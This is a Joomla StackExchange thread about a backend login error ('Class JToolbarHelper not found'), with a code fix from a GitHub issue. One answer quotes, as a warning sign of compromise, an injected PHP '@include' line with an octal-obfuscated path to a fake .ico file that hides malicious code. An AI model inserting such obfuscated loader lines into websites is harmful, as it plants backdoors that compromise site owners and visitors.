# "0 Class 'JToolbarHelper' not found" error while trying to login to the backend

Tags: joomla-3.x, javascript, administrator, development-tool

I am trying to login to the backend of my Joomla installation and have this error:

> 0 Class 'JToolbarHelper' not found

I'm not sure how to fix it.

I updated the tmp directory in the server setting to match the webhost as I was having troubles running the autoupdate and it broke the backend.

Joomla 3.8

Comment: Did you update to Joomla 3.9? Also can you provide the stack trace?

Comment: You found any solution? I have the same issue!

Comment: @BrianH DavidMarceloFinzi is wondering if you have managed to find a solution for this issue because he, too, is experiencing the same issue.  If so, please post your resolution in an educational manner for the benefit of researchers.

Comment: This may be a duplicate of the question at: https://joomla.stackexchange.com/q/20710/120 although there is a more recent discussion at: https://github.com/joomla/joomla-cms/issues/21960 - I'd be inclined to update Joomla and all third party extensions to the latest versions to see if that helps.

Answer (score 3):

I was able to solve the issue thanks to the help from [github](http://%20github.com/joomla/joomla-cms/issues/21960).

Add following code to the /sitefolder/administrator/includes/helper.php:

```
if(!class_exists('JToolbarHelper')) {
require_once JPATH_ADMINISTRATOR . '/includes/toolbar.php';
}
```

then I update it again to the latest version.

Answer (score -1):

I have been having similar issues and found a more sinister cause.
Check your index.php files and see it there is something similar to
/*d6f96*/

@include "\057h\157m\145/\164w\157f\157r\164h\145r\157a\144/\160u\142l\151c\137h\164m\154/\154i\142r\141r\151e\163/\166e\156d\157r\057c\157m\160o\163e\162/\0561\143c\0704\0717\064.\151c\157";

/*d6f96*/

If so check your folders and you will find many index.php files with similar entry that should not be there.

it is encoded php that points to fake ICO files which are actually source and not image

If this is the case please respond and I can help a bit more
Cheers
Tony

Comment: It is entirely possible that two unrelated problems can express similar symptoms -- especially an error as vague as the one posted.  Your "answer" doesn't actually provide a solution, it is asking for question clarification and requires the OP and/or future researchers to contact you if they would like your assistance -- that's not how this site works.  I'm sorry that you don't have the privilege to comment yet, but it won't take long to acquire the privilege if you post a couple solid answers to Clear questions.  Thank you for contributing, but I must flag this post as Not an Answer.

Comment: Just so you know, I did not downvote your answer.  Clearly you intended to help, and I prefer not to downvote new contributors because I don't want to discourage anyone  from posting in the future.  There is a learning curve when first coming to StackExchange sites.  I was a beginner once.  We are here to help each other.